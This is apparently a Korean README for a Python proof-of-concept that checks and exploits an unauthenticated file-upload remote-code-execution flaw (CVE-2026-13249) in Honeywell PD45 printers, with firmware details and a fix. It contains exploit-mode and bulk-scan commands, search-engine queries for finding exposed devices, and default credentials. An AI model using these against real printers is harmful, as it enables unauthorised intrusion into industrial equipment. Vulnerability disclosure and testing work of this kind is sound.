
Honeywell PD45 웹 관리자(펌웨어 F10.19.010040–F10.22.030745 이전)에서 인증되지 않은 임의 파일 업로드로 인한 RCE. Python 검사/익스플로잇 PoC
CVE-2026-13249 — Honeywell PD45 산업용 프린터 웹 관리 인터페이스에 대한 Python 3 PoC입니다.
CVE-2026-13249 — 펌웨어 F10.19.010040부터 F10.22.030745 이전까지 프린터 HTTPS 웹 관리자에서 인증되지 않은 임의 파일 업로드가 가능합니다 (CWE-306, CWE-434, CWE-78). 공격자는 공격자가 제어하는 파일을 업로드하여 기기에서 명령으로 실행될 수 있습니다 (RCE). CVSS 9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 수정: F10.22.030745 이상으로 업그레이드하고, 웹 UI를 신뢰할 수 있는 관리 네트워크로 제한하십시오.
PoC 페이지: https://pocbit.org/pocs/cve-2026-13249
카탈로그: https://pocbit.org/pocs/
| 제품 | Honeywell PD45 산업용 프린터 |
| 영향받는 펌웨어 | ≥ F10.19.010040 및 < F10.22.030745 |
| 수정된 펌웨어 | F10.22.030745 |
| 인터페이스 | 웹 관리 (HTTPS, 기본 자격 증명은 인증된 흐름에 대해 itadmin / pass로 문서화됨) |
| 영향 | 인증되지 않은 업로드 → RCE |
Honeywell의 공개 권고문은 정확한 인증되지 않은 업로드 URI를 공개하지 않습니다. 이 PoC는 기기와 펌웨어를 핑거프린팅하고, 선택적으로 /Manage/ 및 /Services/ 아래의 멀티파트 폼을 스크래핑하며, 랩 장비에서 직접 캡처한 **--upload-url**을 지원합니다.
pip install -r requirements.txt
python poc.py -u https://10.10.10.50 --mode check
python poc.py -u https://10.10.10.50 --mode check --upload-probe
python poc.py -u https://10.10.10.50 --mode exploit \
--upload-url "https://10.10.10.50/..." --field file \
--verify-url "https://10.10.10.50/pocbit_13249.txt"
python poc.py --list targets.example.txt --mode check -j 8
title="Honeywell" && body="PD45"
ssl.cert.subject.cn="PD45"
소유하거나 평가에 대한 명시적 허가를 받은 프린터에서만 승인된 테스트를 수행하십시오. --upload-probe / --mode exploit은 대상 기기에 데이터를 기록합니다.